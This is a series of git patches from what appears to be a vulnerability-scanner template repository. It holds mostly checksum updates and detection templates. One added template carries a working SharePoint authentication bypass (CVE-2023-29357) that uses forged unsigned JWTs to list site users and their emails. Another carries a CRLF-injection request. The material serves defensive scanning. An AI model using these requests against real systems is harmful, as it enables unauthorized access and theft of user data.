-templates-checksum.txt:c845d212427365ed390bdce5d37323117b983e6c
+templates-checksum.txt:113c03154848f7e3fafcd182ae190ebe45679bab
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From d008a02bc65e3332fde033cc405ef95f60e3fb04 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 29 Sep 2023 11:11:33 +0530
Subject: [PATCH 0595/1090] reference - update

---
 http/misconfiguration/installer/shopware-installer.yaml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/http/misconfiguration/installer/shopware-installer.yaml b/http/misconfiguration/installer/shopware-installer.yaml
index fd3d73ba9e..6e99754fa8 100644
--- a/http/misconfiguration/installer/shopware-installer.yaml
+++ b/http/misconfiguration/installer/shopware-installer.yaml
@@ -4,6 +4,8 @@ info:
   name: Shopware Installer
   author: DhiyaneshDk
   severity: high
+  reference:
+    - https://www.shopware.com/en/
   metadata:
     max-request: 1
     verified: true

From f4f1b8da900762827d1e116bee94bcfde45db62c Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 05:48:02 +0000
Subject: [PATCH 0596/1090] Auto Generated New Template Addition List [Fri Sep
 29 05:48:02 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index c3bd892680..e4a7c6d80d 100644
--- a/.new-additions
+++ b/.new-additions
@@ -15,6 +15,7 @@ http/misconfiguration/installer/gibbon-installer.yaml
 http/misconfiguration/installer/klr300n-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml
 http/misconfiguration/installer/ojs-installer.yaml
+http/misconfiguration/installer/shopware-installer.yaml
 http/misconfiguration/installer/vironeer-installer.yaml
 http/misconfiguration/installer/zabbix-installer.yaml
 http/misconfiguration/installer/zencart-installer.yaml

From a87af2fceedc6bcded798f766a287ca805f84485 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 05:48:11 +0000
Subject: [PATCH 0597/1090] Auto Generated Templates Checksum [Fri Sep 29
 05:48:11 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 29b09ce174..93b39314c8 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -4546,6 +4546,7 @@ http/misconfiguration/installer/processwire-installer.yaml:0cd20a9834b202c9de480
 http/misconfiguration/installer/redash-installer.yaml:27eb2eb7f857ffedf9eaaee483bc7d6e7231f5cd
 http/misconfiguration/installer/server-monitor-installer.yaml:b76832516a1fddb3100549d7792bdcf90162a2c6
 http/misconfiguration/installer/shopify-app-installer.yaml:0fd1dfe851c0fe1a077960bff792431845ac2d6d
+http/misconfiguration/installer/shopware-installer.yaml:e43f0aa409d71b66f112048fbffa7656fdd85ad3
 http/misconfiguration/installer/smf-installer.yaml:17fb2697893767a0fd0185367fa9d46b20ab1f0f
 http/misconfiguration/installer/sms-installer.yaml:9f0f50c973150c05748646e0aa126699737d4143
 http/misconfiguration/installer/spip-install.yaml:0738036665e50e622dd59dfcd1633fdae56e4bce
@@ -7200,7 +7201,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:113c03154848f7e3fafcd182ae190ebe45679bab
+templates-checksum.txt:3b3bc04d311b7f9a7f5669a1b264eb54cd17cb40
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From d5a51a3fe410fbfa5212df0ff3e030e37694f7fd Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 05:50:39 +0000
Subject: [PATCH 0599/1090] Auto Generated Templates Checksum [Fri Sep 29
 05:50:39 UTC 2023] :robot:

---
 templates-checksum.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 93b39314c8..a2f7345562 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -18,7 +18,7 @@ dns/dns-saas-service-detection.yaml:b8e5a37cc3e5fcdeb3ec3a742b8bc81babf5c302
 dns/dns-waf-detect.yaml:f4d80afe7d48cee91123294482cd63cadeaa943d
 dns/dnssec-detection.yaml:6dd2e7d114f3be862e2f1e87f5d2d2c4de1bf08a
 dns/ec2-detection.yaml:01823f3399c471516137b067f37f5c6661ae3099
-dns/elasticbeanstalk-takeover.yaml:74782c42ecb76272ac56760c6216b71d9cb13e26
+dns/elasticbeanstalk-takeover.yaml:429b92a11cdfe0efb1f5483d886de33574ff3842
 dns/mx-fingerprint.yaml:191e425d8cad1d504d8f7ca3b19914cfd77ebb7b
 dns/mx-service-detector.yaml:30d6bf3fec86d54f93a83438afe8595aff572212
 dns/nameserver-fingerprint.yaml:73093f4b321ce7b50e4f1cd0b16b037beb85b008
@@ -7201,7 +7201,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:3b3bc04d311b7f9a7f5669a1b264eb54cd17cb40
+templates-checksum.txt:ebee486392dd31fdaf5831b288cca1a31fb316d2
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 2a81f77448d6b0c2c9fdbc0c5777b0d0a7d426b1 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 05:55:13 +0000
Subject: [PATCH 0600/1090] Auto Generated New Template Addition List [Fri Sep
 29 05:55:13 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index e4a7c6d80d..3223de147b 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+http/cves/2014/CVE-2014-9180.yaml
 http/cves/2023/CVE-2023-2479.yaml
 http/cves/2023/CVE-2023-2766.yaml
 http/cves/2023/CVE-2023-36845.yaml

From b26104cafe5aabe0be2e2f6b469298fdd28bf4a9 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 05:55:24 +0000
Subject: [PATCH 0601/1090] Auto Generated Templates Checksum [Fri Sep 29
 05:55:24 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index a2f7345562..1c44da66b7 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -871,6 +871,7 @@ http/cves/2014/CVE-2014-8682.yaml:f2d4cd87164f7d408f6b6a9afe6497a9d340134b
 http/cves/2014/CVE-2014-8799.yaml:acc7f6229d89b9982c8754476a020d33549cfea1
 http/cves/2014/CVE-2014-9094.yaml:6aceccb27fe60db3986c894ec0fe8b1824d292f8
 http/cves/2014/CVE-2014-9119.yaml:2e5e24517d7dfd7dc02495fd15f4388c422ae506
+http/cves/2014/CVE-2014-9180.yaml:40d6ae222fae8d5a9ca8a94fc2f84076b9f0cdda
 http/cves/2014/CVE-2014-9444.yaml:f29d331bcbb3aee82c455266195817b3a344dbd3
 http/cves/2014/CVE-2014-9606.yaml:9936288573d40a7d7b49300eb8f64d5bcd0edc03
 http/cves/2014/CVE-2014-9607.yaml:1795a0604846e459806d49f84c0ed59080d7805c
@@ -7201,7 +7202,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:ebee486392dd31fdaf5831b288cca1a31fb316d2
+templates-checksum.txt:cd58b563b9ccd457fac16b9ed587a29275e61804
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 77bfd179492ff28d8f52172c481f4aba36fefffc Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 05:57:07 +0000
Subject: [PATCH 0602/1090] TemplateMan Update [Fri Sep 29 05:57:07 UTC 2023]
 :robot:

---
 http/cves/2014/CVE-2014-9180.yaml | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml
index 1e5f5efc3e..2eb77dea8a 100644
--- a/http/cves/2014/CVE-2014-9180.yaml
+++ b/http/cves/2014/CVE-2014-9180.yaml
@@ -6,21 +6,22 @@ info:
   severity: medium
   description: |
     Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.
-  remediation: |
-    Update to the latest version of Eleanor CMS  to fix the open redirect vulnerability.
   reference:
     - https://packetstormsecurity.com/files/129087/Eleanor-CMS-Open-Redirect.html
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9180
+  remediation: |
+    Update to the latest version of Eleanor CMS  to fix the open redirect vulnerability.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/Au:N/C:N/I:P/A:N
-    cvss-score: 5.0
+    cvss-score: 5
     cve-id: CVE-2014-9180
     cwe-id: CWE-601
   metadata:
-    verified: true
+    max-request: 1
     product: eleanor_cms
-    vendor: eleanor-cms
     shodan-query: html:"eleanor"
+    vendor: eleanor-cms
+    verified: true
   tags: cve,cve2014,eleanor,cms,redirect
 
 http:

From 5574a26f60109a1528897272184bea0e7c044733 Mon Sep 17 00:00:00 2001
From: jainiresh <78695432+jainiresh@users.noreply.github.com>
Date: Fri, 29 Sep 2023 13:46:22 +0530
Subject: [PATCH 0603/1090] Update CVE-2019-6802.yaml

Updated to remove false positives.
As the previous change matches the words "Set-Cookie: crlfinjection=1" even if the words are present in the Location header too.

The updated code, will match only if the "Set-Cookie: crlfinjection=1" is actually a header, by verifying that it actually starts in the beginning of a response header.
---
 http/cves/2019/CVE-2019-6802.yaml | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml
index ca344b97b4..3f16236ac7 100644
--- a/http/cves/2019/CVE-2019-6802.yaml
+++ b/http/cves/2019/CVE-2019-6802.yaml
@@ -34,7 +34,6 @@ http:
       - "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
 
     matchers:
-      - type: word
+      - type: regex
         part: header
-        words:
-          - 'Set-Cookie: crlfinjection=1;'
+        regex: '^Set-Cookie: crlfinjection=1;'

From e109f59372ce0cfe9d1ff631d26981a8729dcd68 Mon Sep 17 00:00:00 2001
From: Daniel Beneyto 
Date: Fri, 29 Sep 2023 10:21:46 +0200
Subject: [PATCH 0604/1090] Added bgp-detect template

---
 network/detection/bgp-detect.yaml | 44 +++++++++++++++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 network/detection/bgp-detect.yaml

diff --git a/network/detection/bgp-detect.yaml b/network/detection/bgp-detect.yaml
new file mode 100644
index 0000000000..d6d7952492
--- /dev/null
+++ b/network/detection/bgp-detect.yaml
@@ -0,0 +1,44 @@
+id: bgp-detect
+
+info:
+  name: BGP Detection
+  author: danfaizer
+  severity: info
+  tags: network,bgp,detect
+  description: |
+    The remote host is running BGP, a popular routing protocol. This indicates that the remote host is probably a network router.
+  impact: |
+    Following best practices, BGP services should only be accessible to participating BGP neighbors to prevent potential attacks.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  reference:
+    - https://www.acunetix.com/vulnerabilities/network/vulnerability/bgp-detection/
+    - https://www.tenable.com/plugins/nessus/11907
+
+tcp:
+  - inputs:
+      - data: FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF001D010400FFFF0000B4C0
+        # Source: https://www.rfc-editor.org/rfc/rfc4271.html#section-4.2
+        # FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF represents the 16-byte marker field.
+        # 001D is the total length of the BGP message, including the 19 bytes of the header and the optional parameters.
+        # 01 is the BGP message type, which is OPEN (1).
+        # 04 represents the BGP version, which is BGP-4.
+        # FFFF represents the Autonomous System Number (ASN) in hexadecimal format.
+        # 0000 represents the Hold Time.
+        # B4C0 represents the BGP Identifier, usually an IP address in hexadecimal format.
+        type: hex
+        name: resp
+
+    host:
+      - "{{Hostname}}"
+      - "{{Host}}:179"
+
+    read-size: 16
+
+    matchers:
+      - type: word
+        encoding: hex
+        words:
+          - "ffffffffffffffffffffffffffffffff"

From 6784a9d2c112be990b30111401bb252ae89f3e78 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 29 Sep 2023 14:24:46 +0530
Subject: [PATCH 0605/1090] format fix

---
 http/cves/2019/CVE-2019-6802.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml
index 3f16236ac7..04b2218181 100644
--- a/http/cves/2019/CVE-2019-6802.yaml
+++ b/http/cves/2019/CVE-2019-6802.yaml
@@ -36,4 +36,5 @@ http:
     matchers:
       - type: regex
         part: header
-        regex: '^Set-Cookie: crlfinjection=1;'
+        regex:
+          - "^Set-Cookie: crlfinjection=1;"

From 9fa9792dbfda62a2fe9a0d33493c19f8bd4d787a Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 29 Sep 2023 14:51:39 +0530
Subject: [PATCH 0606/1090] misc fix

---
 network/detection/bgp-detect.yaml | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/network/detection/bgp-detect.yaml b/network/detection/bgp-detect.yaml
index d6d7952492..8adf764fc5 100644
--- a/network/detection/bgp-detect.yaml
+++ b/network/detection/bgp-detect.yaml
@@ -4,7 +4,6 @@ info:
   name: BGP Detection
   author: danfaizer
   severity: info
-  tags: network,bgp,detect
   description: |
     The remote host is running BGP, a popular routing protocol. This indicates that the remote host is probably a network router.
   impact: |
@@ -16,10 +15,14 @@ info:
   reference:
     - https://www.acunetix.com/vulnerabilities/network/vulnerability/bgp-detection/
     - https://www.tenable.com/plugins/nessus/11907
+  metadata:
+    shodan-query: product:"BGP"
+  tags: network,bgp
 
 tcp:
   - inputs:
       - data: FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF001D010400FFFF0000B4C0
+        type: hex
         # Source: https://www.rfc-editor.org/rfc/rfc4271.html#section-4.2
         # FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF represents the 16-byte marker field.
         # 001D is the total length of the BGP message, including the 19 bytes of the header and the optional parameters.
@@ -28,17 +31,14 @@ tcp:
         # FFFF represents the Autonomous System Number (ASN) in hexadecimal format.
         # 0000 represents the Hold Time.
         # B4C0 represents the BGP Identifier, usually an IP address in hexadecimal format.
-        type: hex
-        name: resp
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:179"
+    port: 179
 
     read-size: 16
-
     matchers:
       - type: word
         encoding: hex
         words:
-          - "ffffffffffffffffffffffffffffffff"
+          - "ffffffffffffffffffffffffffffffff"
\ No newline at end of file

From 1eb5d9f7822418b0a2a01815e1a41f45a9101e7d Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 09:30:51 +0000
Subject: [PATCH 0607/1090] Auto Generated New Template Addition List [Fri Sep
 29 09:30:51 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 3223de147b..d22191f106 100644
--- a/.new-additions
+++ b/.new-additions
@@ -21,3 +21,4 @@ http/misconfiguration/installer/vironeer-installer.yaml
 http/misconfiguration/installer/zabbix-installer.yaml
 http/misconfiguration/installer/zencart-installer.yaml
 http/technologies/blazor-webassembly-detect.yaml
+network/detection/bgp-detect.yaml

From 4b0d7e0bee43f5d7ae6b9df39adec3d1e83d5a9e Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 09:30:59 +0000
Subject: [PATCH 0608/1090] Auto Generated Templates Checksum [Fri Sep 29
 09:30:59 UTC 2023] :robot:

---
 templates-checksum.txt | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 1c44da66b7..af38c0329d 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -871,7 +871,7 @@ http/cves/2014/CVE-2014-8682.yaml:f2d4cd87164f7d408f6b6a9afe6497a9d340134b
 http/cves/2014/CVE-2014-8799.yaml:acc7f6229d89b9982c8754476a020d33549cfea1
 http/cves/2014/CVE-2014-9094.yaml:6aceccb27fe60db3986c894ec0fe8b1824d292f8
 http/cves/2014/CVE-2014-9119.yaml:2e5e24517d7dfd7dc02495fd15f4388c422ae506
-http/cves/2014/CVE-2014-9180.yaml:40d6ae222fae8d5a9ca8a94fc2f84076b9f0cdda
+http/cves/2014/CVE-2014-9180.yaml:b50a23a568d1c7a1a124e2ad1d0515983e7aefb5
 http/cves/2014/CVE-2014-9444.yaml:f29d331bcbb3aee82c455266195817b3a344dbd3
 http/cves/2014/CVE-2014-9606.yaml:9936288573d40a7d7b49300eb8f64d5bcd0edc03
 http/cves/2014/CVE-2014-9607.yaml:1795a0604846e459806d49f84c0ed59080d7805c
@@ -7085,6 +7085,7 @@ network/default-login/ldap-anonymous-login.yaml:de040a46cb1ed8184db1ff0f88d03eb2
 network/detection/activemq-openwire-transport-detect.yaml:0dc9e5e360bd3b2e2a919f62e489e924ae8b82d3
 network/detection/apache-activemq-detect.yaml:121abc64adbf17327bc23a8431f3b5e08f510dfe
 network/detection/axigen-mail-server-detect.yaml:c7e5b22d9b36cb6bb48b9347aa8eec265b7214a0
+network/detection/bgp-detect.yaml:b9df7b968dc8a59fe94e3ef66ca1b24b543a5465
 network/detection/cisco-finger-detect.yaml:770b049aa09f72d15c6bd23a04899a330eb4a256
 network/detection/clamav-detect.yaml:09433cdc329da80ee710a7e5893d8ee2cad9eb73
 network/detection/cql-native-transport.yaml:73ac12a1c9eff62746d27dccd4e776573175bf2e
@@ -7202,7 +7203,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:cd58b563b9ccd457fac16b9ed587a29275e61804
+templates-checksum.txt:ab60010e2a49eac2b68f6fd7f1916339434622c8
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 0b5872b72f18cbc37007c8664602ac5a615cfee1 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 09:33:18 +0000
Subject: [PATCH 0609/1090] TemplateMan Update [Fri Sep 29 09:33:18 UTC 2023]
 :robot:

---
 network/detection/bgp-detect.yaml | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)

diff --git a/network/detection/bgp-detect.yaml b/network/detection/bgp-detect.yaml
index 8adf764fc5..88de1d7635 100644
--- a/network/detection/bgp-detect.yaml
+++ b/network/detection/bgp-detect.yaml
@@ -6,16 +6,14 @@ info:
   severity: info
   description: |
     The remote host is running BGP, a popular routing protocol. This indicates that the remote host is probably a network router.
-  impact: |
-    Following best practices, BGP services should only be accessible to participating BGP neighbors to prevent potential attacks.
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
-    cwe-id: CWE-200
   reference:
     - https://www.acunetix.com/vulnerabilities/network/vulnerability/bgp-detection/
     - https://www.tenable.com/plugins/nessus/11907
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cwe-id: CWE-200
   metadata:
+    max-request: 1
     shodan-query: product:"BGP"
   tags: network,bgp
 

From fd690460973dd723ad16b7f4928d1b8c638ea698 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 29 Sep 2023 18:51:23 +0530
Subject: [PATCH 0610/1090] Added CVE-2023-29357 (Microsoft SharePoint -
 Authentication Bypass)

---
 http/cves/2023/CVE-2023-29357.yaml | 66 ++++++++++++++++++++++++++++++
 1 file changed, 66 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-29357.yaml

diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml
new file mode 100644
index 0000000000..d1ba80af7e
--- /dev/null
+++ b/http/cves/2023/CVE-2023-29357.yaml
@@ -0,0 +1,66 @@
+id: CVE-2023-29357
+
+info:
+  name: Microsoft SharePoint - Authentication Bypass
+  author: pdteam
+  severity: critical
+  description: |
+    Microsoft SharePoint Server Elevation of Privilege Vulnerability
+  reference:
+    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357
+    - https://srcincite.io/advisories/src-2020-0022/
+    - https://github.com/Chocapikk/CVE-2023-29357
+    - https://sec.vnpt.vn/2023/08/phan-tich-cve-2023-29357-microsoft-sharepoint-validatetokenissuer-authentication-bypass-vulnerability/
+    - https://starlabs.sg/blog/2023/09-sharepoint-pre-auth-rce-chain/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-29357
+    epss-score: 0.00267
+    epss-percentile: 0.63767
+    cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: microsoft
+    product: sharepoint_server
+    fofa-query: app="Microsoft-SharePoint"
+    shodan-query: http.headers_hash:-1968878704
+  tags: cve,cve2023,microsoft,sharepoint_server
+
+variables:
+  client_id: "00000003-0000-0ff1-ce00-000000000000"
+
+http:
+  - raw:
+      - |
+        GET /_api/web/siteusers HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer
+      - |
+        GET /_api/web/siteusers HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        Authorization: Bearer {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA
+        X-PROOF_TOKEN: {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA
+
+    extractors:
+      - type: regex
+        part: header
+        group: 1
+        name: realm
+        regex:
+          - realm="([^"]*)"
+        internal: true
+
+      - type: json
+        json:
+          - .value[].Email
+
+    matchers:
+      - type: word
+        words:
+          - LoginName
+          - Email
+          - IsSiteAdmin
+        condition: and

From ff450a65baf26ac7c25d8cebd5a130ec9f3ede4d Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 29 Sep 2023 19:04:39 +0530
Subject: [PATCH 0611/1090] strict matcher

---
 http/cves/2023/CVE-2023-29357.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml
index d1ba80af7e..fcf079ce44 100644
--- a/http/cves/2023/CVE-2023-29357.yaml
+++ b/http/cves/2023/CVE-2023-29357.yaml
@@ -59,6 +59,7 @@ http:
 
     matchers:
       - type: word
+        part: body_2
         words:
           - LoginName
           - Email

From c8a3864f086992d2eb2aca90d3f12f27ef4a02cb Mon Sep 17 00:00:00 2001
From: Thabisocn 
Date: Fri, 29 Sep 2023 16:05:22 +0200
Subject: [PATCH 0612/1090] Added a google bucket detecter

---
 file/android/google-bucket.yaml | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
 create mode 100644 file/android/google-bucket.yaml

diff --git a/file/android/google-bucket.yaml b/file/android/google-bucket.yaml
new file mode 100644
index 0000000000..3dd2d6d483
--- /dev/null
+++ b/file/android/google-bucket.yaml
@@ -0,0 +1,16 @@
+id: google-storage-bucket
+
+info:
+  name: Detect Mobile apps using Google storage Bucket 
+  author: Thabisocn
+  severity: info
+
+file:
+  - extensions:
+      - all
+
+    extractors:
+      - type: regex
+        regex:
+          - "[a-z0-9.-]+\\.appspot\\.com"
+          

From 404aabdcf43435f76f30f86de430a4bbec915ace Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 29 Sep 2023 20:40:50 +0530
Subject: [PATCH 0613/1090] fixes dns templates

---
 dns/azure-takeover-detection.yaml   |  8 ++---
 dns/caa-fingerprint.yaml            |  6 ++--
 dns/detect-dangling-cname.yaml      | 14 ++++----
 dns/dmarc-detect.yaml               |  6 ++++
 dns/dns-saas-service-detection.yaml | 53 ++++++++++++++++++++++++++---
 dns/dns-waf-detect.yaml             | 24 +++++++++++++
 dns/dnssec-detection.yaml           |  3 +-
 dns/elasticbeanstalk-takeover.yaml  |  7 ++--
 dns/mx-fingerprint.yaml             |  7 ++--
 dns/nameserver-fingerprint.yaml     |  7 ++--
 dns/ptr-fingerprint.yaml            | 14 ++++----
 dns/txt-fingerprint.yaml            |  7 ++--
 12 files changed, 117 insertions(+), 39 deletions(-)

diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml
index a04bef1ba5..dc425ce0c9 100644
--- a/dns/azure-takeover-detection.yaml
+++ b/dns/azure-takeover-detection.yaml
@@ -24,6 +24,7 @@ dns:
     matchers-condition: and
     matchers:
       - type: word
+        part: answer
         words:
           - "azure-api.net"
           - "azure-mobile.net"
@@ -50,7 +51,6 @@ dns:
           - "NXDOMAIN"
 
     extractors:
-      - type: regex
-        group: 1
-        regex:
-          - "IN\tCNAME\t(.+)"
+      - type: dsl
+        dsl:
+          - cname
diff --git a/dns/caa-fingerprint.yaml b/dns/caa-fingerprint.yaml
index 410f68921e..f3682db62b 100644
--- a/dns/caa-fingerprint.yaml
+++ b/dns/caa-fingerprint.yaml
@@ -18,9 +18,9 @@ dns:
     type: CAA
 
     matchers:
-      - type: word
-        words:
-          - "IN\tCAA"
+      - type: regex
+        regex:
+          - "IN\tCAA\\t(.+)$"
 
     extractors:
       - type: regex
diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml
index f9676a5946..4a42d7147a 100644
--- a/dns/detect-dangling-cname.yaml
+++ b/dns/detect-dangling-cname.yaml
@@ -26,12 +26,12 @@ dns:
         words:
           - "NXDOMAIN"
 
-      - type: word
-        words:
-          - "IN\tCNAME"
+      - type: regex
+        part: answer
+        regex:
+          - "IN\tCNAME\\t(.+)$"
 
     extractors:
-      - type: regex
-        group: 1
-        regex:
-          - "IN\tCNAME\t(.+)"
\ No newline at end of file
+      - type: dsl
+        dsl:
+          - cname
\ No newline at end of file
diff --git a/dns/dmarc-detect.yaml b/dns/dmarc-detect.yaml
index 0c7b785f67..dc180b7178 100644
--- a/dns/dmarc-detect.yaml
+++ b/dns/dmarc-detect.yaml
@@ -21,6 +21,12 @@ dns:
   - name: "_dmarc.{{FQDN}}"
     type: TXT
 
+    matchers:
+      - type: regex
+        part: answer
+        regex:
+          - "IN\tTXT\\t(.+)$"
+
     extractors:
       - type: regex
         group: 1
diff --git a/dns/dns-saas-service-detection.yaml b/dns/dns-saas-service-detection.yaml
index f11d6cf5a1..6805bb5d6e 100644
